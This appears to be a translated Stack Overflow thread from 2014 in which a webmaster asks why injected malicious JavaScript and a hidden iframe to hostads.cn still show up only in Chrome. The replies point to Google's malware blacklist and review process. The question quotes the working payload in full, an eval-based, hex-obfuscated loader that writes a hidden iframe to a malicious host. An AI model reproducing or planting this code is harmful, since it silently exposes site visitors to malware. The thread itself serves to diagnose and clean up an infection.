恶意 javascript 注入 (Hostads.cn)答案

【问题标题】：Malicious javascript injection (Hostads.cn)恶意 javascript 注入 (Hostads.cn)
【发布时间】：2014-08-31 04:07:41
【问题描述】：

我的网站似乎被黑了，或者发现了漏洞等等，所以现在每次我加载某些页面时，都会注入以下 javascript 和 iframe：

<script language="JavaScript" type="text/javascript">
B76197C940748B="pars";B76197C940748B+="eIn";B76197C940748B+="t";DCEC79103="St";DCEC79103+="ring.";DCEC79103+="fr";DCEC79103+="omC";DCEC79103+="harCo";DCEC79103+="de";function E0D7700E45C574E(A911795){var B3593798FBC66C=370;B3593798FBC66C=B3593798FBC66C-354;D086A805=eval(B76197C940748B+"(A911795,B3593798FBC66C)");return(D086A805);}function A41D3C153B9E8(E02A0){var D49C4143=940;D49C4143=D49C4143-938;var FB8E017784670AD="";for(E1709AB22C52CD=0;E1709AB22C52CD<E02A0.length;E1709AB22C52CD+=D49C4143){FB8E017784670AD+=( eval(DCEC79103+"(E0D7700E45C574E(E02A0.substr(E1709AB22C52CD,D49C4143)))"));}eval(FB8E017784670AD);}A41D3C153B9E8("69662028646F63756D656E742E636F6F6B69652E73656172636828227574626F3D382229203D3D202D3129207B0A7463707A3D646F63756D656E742E676574456C656D656E7442794964282771757A676327293B6966287463707A3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71757A6763207372633D687474703A2F2F686F73746164732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D20227574626F3D383B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");
</script>

<iframe id="quzgc" src="http://hostads.cn" style="display:none"></iframe>

我已经更新了我所有的密码（我的控制面板、数据库、ftp……一切）并删除了我所有页面、php 文件、javascript 文件等上的恶意代码……我还修复了权限我所有文件和文件夹的数量为 755。（被感染的页面设置为 777）。

在 Internet Explorer、Firefox、Opera 和 Safari 中问题似乎已解决。那里一切正常，不再插入任何恶意代码。然而，当我用谷歌浏览器浏览我的网站时，我得到著名的“警告：检测到恶意软件”页面，告诉我谷歌发现了“hostads.cn”的内容，这是一个已知的恶意网站。然后，当我查看源代码时，我确实可以在我的代码中看到某些 javascript 和 iframe。

我尝试调试我的网站，逐步检查代码以检查代码注入的位置或内容，但我真的找不到任何东西。所有其他浏览器似乎也没有受到影响。

另一个奇怪的地方：当我“让”我的网页被感染时：即：我忽略了来自 Chrome 的警告并继续访问该网页，我确实可以在我的源代码中看到恶意代码。但是当我用 FTP 下载那个特定页面时，一切看起来都很好......

那么为什么这个恶意代码只插入谷歌浏览器，而不是以持久的方式？更重要的是：我能做些什么来对抗它？

谢谢。

【问题讨论】：

这可能只是缓存问题，尝试使用 cntrl f5 强制完全刷新
你可能想读到这个：support.google.com/webmasters/bin/…
看起来您已经解决了问题，但您仍然在黑名单中。可能这个工具可以准确地告诉你你在哪个黑名单上：google.com/safebrowsing/diagnostic?site=http://www.example.com
尝试了硬刷新和清除缓存，没有用。 @安迪

标签： javascript html malware

【解决方案1】：

Google 会根据黑名单进行处理。您需要通过 Google 网站管理员工具让 Google 知道您已修复它。我认为你已经从网站上删除了违规代码，但你仍然在黑名单上。

网站健康

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=1624972

请求恶意软件审查

https://support.google.com/webmasters/bin/answer.py?hl=en&answer=168328&ctx=cb&src=cb&cbid=15vfwobwt144o&cbrank=1

【讨论】：

问题是，恶意软件感染不在网站的公共部分，而是在受密码保护的 CMS 部分。 Google 是否也能够“扫描”该部分？
您的浏览器将您放入其中...当您使用 Chrome 访问该网站时，它发现了恶意软件并告诉了 Google。请参阅 Google 安全浏览功能 google.com/chrome/intl/en/privacy.html。希望 :( 当您再次访问该网站时会发生“扫描”。
好吧，我添加了网站，并将 /CMS 子文件夹添加到我的 Google 网站管理员帐户中，检查了恶意软件。 Google 没有找到任何内容，但我仍然收到警告消息并看到恶意代码出现在我的源代码中。也许可能需要几个小时/几天？在此期间我可以使用其他浏览器，但我当然希望看到这个问题得到解决。
好的，等待 10 分钟然后清除缓存似乎已经成功了。谢谢！